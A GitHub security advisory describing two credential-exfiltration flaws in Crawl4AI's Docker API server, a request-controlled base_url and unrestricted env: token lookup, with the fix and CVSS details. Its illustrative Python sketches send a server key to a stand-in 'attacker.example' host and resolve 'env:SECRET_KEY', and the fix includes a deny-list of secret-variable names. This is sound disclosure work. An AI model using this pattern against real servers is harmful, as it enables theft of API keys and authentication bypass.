Crawl4AI: LLM credential exfiltration in Docker server via request base_url and env: token resolution

High severity · GitHub Reviewed · Published Jun 4, 2026 in unclecode/crawl4ai

Package

crawl4ai (pip)

Affected versions

<= 0.8.7

Patched versions

0.8.8

Description

Summary

The Docker API server let a request control where LLM calls were sent and which environment variable an LLM token resolved from. Both could be abused to exfiltrate server-held secrets. The Docker API is unauthenticated by default.

Vector 1 - attacker base_url

The /md, /llm, and /llm/job endpoints accepted a base_url in the request and used it as the LLM endpoint while still attaching the server's configured provider API key. An attacker could set base_url to a server they control and receive the configured provider key (and any other provider keys the server holds) in the request that arrives at that server.
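
The pattern behind Vector 1 can be illustrated with a minimal sketch. This is not the Crawl4AI source: `PROVIDER_ENDPOINTS`, `OutboundCall`, `build_call_vulnerable`, the `/chat/completions` path, and the `Authorization: Bearer` header format are all hypothetical names and assumptions chosen for illustration. The sketch only constructs the outbound call and sends nothing over the network.

```python
from dataclasses import dataclass

# Hypothetical provider table; the server's real mapping is not shown in this advisory.
PROVIDER_ENDPOINTS = {"openai": "https://api.openai.com/v1"}


@dataclass
class OutboundCall:
    url: str
    headers: dict


def build_call_vulnerable(body: dict, server_api_key: str) -> OutboundCall:
    """Illustrative only: the request picks the endpoint, the server supplies the key."""
    # A request-supplied base_url takes precedence over the provider default.
    base = body.get("base_url") or PROVIDER_ENDPOINTS[body["provider"]]
    return OutboundCall(
        url=f"{base.rstrip('/')}/chat/completions",
        # Assumed header format; the server-held key travels to whatever `base` is.
        headers={"Authorization": f"Bearer {server_api_key}"},
    )


call = build_call_vulnerable(
    {"provider": "openai", "base_url": "https://attacker.example/v1"},
    server_api_key="sk-server-held-key",  # placeholder value, not a real key
)
print(call.url)
print(call.headers["Authorization"])
```

In this sketch the attacker never needs to know the key: the server attaches it to a request bound for the attacker's host.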

Vector 2 - arbitrary environment variable read via env:

LLMConfig(api_token="env:NAME") resolved NAME from the server environment with os.getenv. Because request bodies were deserialized into LLMConfig (via a crawler config / extraction strategy), an attacker could set api_token="env:SECRET_KEY" (or env:REDIS_PASSWORD, etc.) and, paired with an attacker base_url, exfiltrate that secret. Reading the server's SECRET_KEY enables forging authentication tokens.
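
The unrestricted lookup described for Vector 2 might look roughly like the sketch below. The function name `resolve_token_vulnerable` is hypothetical and the code is an assumption about the general shape of the behavior, not the library's implementation; the only details taken from the advisory are the `env:` prefix and the use of `os.getenv`.

```python
import os
from typing import Optional


def resolve_token_vulnerable(api_token: str) -> Optional[str]:
    """Illustrative only: any env:NAME value is read from the server environment."""
    prefix = "env:"
    if api_token.startswith(prefix):
        # No allow-list or deny-list: the caller chooses which variable is read.
        return os.getenv(api_token[len(prefix):])
    return api_token


# Demo value standing in for a real server secret.
os.environ["SECRET_KEY"] = "demo-jwt-signing-secret"

leaked = resolve_token_vulnerable("env:SECRET_KEY")
print(leaked)
```

Combined with an attacker-chosen base_url, the resolved value would be sent to the attacker as if it were the LLM token.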

Impact

Disclosure of LLM provider API keys and other server secrets to an attacker-controlled endpoint; reading the JWT SECRET_KEY can lead to authentication bypass.

Fix

  • The LLM endpoints ignore a request-supplied base_url; the endpoint is always derived server-side from the provider name. The field is still accepted but no longer honored (no breaking 4xx).
  • LLMConfig refuses env: resolution of protected environment-variable names (names containing SECRET/PASSWORD/PRIVATE, prefixes CRAWL4AI*/AWS_SECRET*, and SECRET_KEY/REDIS_PASSWORD/TOKEN). Normal provider keys (e.g. OPENAI_API_KEY) are unaffected.
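
The two fixes above can be sketched as follows. This is a hedged illustration, not the patched code: the names `is_protected`, `resolve_token`, and `endpoint_for` are hypothetical, the case-insensitive comparison and the use of `ValueError` to signal refusal are assumptions, and the pattern lists simply transcribe the names given in the advisory.

```python
import os
from typing import Optional

# Patterns transcribed from the advisory text; matching rules are assumed.
PROTECTED_SUBSTRINGS = ("SECRET", "PASSWORD", "PRIVATE")
PROTECTED_PREFIXES = ("CRAWL4AI", "AWS_SECRET")
PROTECTED_EXACT = {"SECRET_KEY", "REDIS_PASSWORD", "TOKEN"}

# Hypothetical provider table used to derive the endpoint server-side.
PROVIDER_ENDPOINTS = {"openai": "https://api.openai.com/v1"}


def is_protected(name: str) -> bool:
    """Return True if an environment-variable name must not be resolved via env:."""
    upper = name.upper()  # assumption: comparison ignores case
    return (
        upper in PROTECTED_EXACT
        or upper.startswith(PROTECTED_PREFIXES)
        or any(part in upper for part in PROTECTED_SUBSTRINGS)
    )


def resolve_token(api_token: str) -> Optional[str]:
    """Resolve env:NAME only when NAME is not a protected variable."""
    prefix = "env:"
    if api_token.startswith(prefix):
        name = api_token[len(prefix):]
        if is_protected(name):
            # Assumption: refusal is signalled with an exception.
            raise ValueError(f"refusing to resolve protected variable {name!r}")
        return os.getenv(name)
    return api_token


def endpoint_for(body: dict) -> str:
    """Derive the endpoint from the provider name; any base_url in body is ignored."""
    return PROVIDER_ENDPOINTS[body["provider"]]


print(is_protected("SECRET_KEY"), is_protected("OPENAI_API_KEY"))
print(endpoint_for({"provider": "openai", "base_url": "https://attacker.example/v1"}))
```

Accepting the base_url field and silently ignoring it keeps existing clients working, while deriving the endpoint from the provider name removes the attacker's control over where the key is sent.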

Workarounds

  • Upgrade to the patched version.
  • Enable authentication (CRAWL4AI_API_TOKEN).
  • Do not place sensitive secrets in the server environment alongside provider keys.

Credits

  • Geo (geo-chen) - reported the LLM credential exfiltration via request base_url.
  • Internal security audit (Crawl4AI maintainers) - the env: arbitrary-variable read.

Published by unclecode to unclecode/crawl4ai Jun 4, 2026
Published to the GitHub Advisory Database Jun 16, 2026
Reviewed Jun 16, 2026

Severity

High

CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: Low
Availability: None

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Weaknesses

Exposure of Sensitive Information to an Unauthorized Actor

The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Insufficiently Protected Credentials

The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

CVE ID

No known CVE

GHSA ID

GHSA-f989-c77f-r2cq
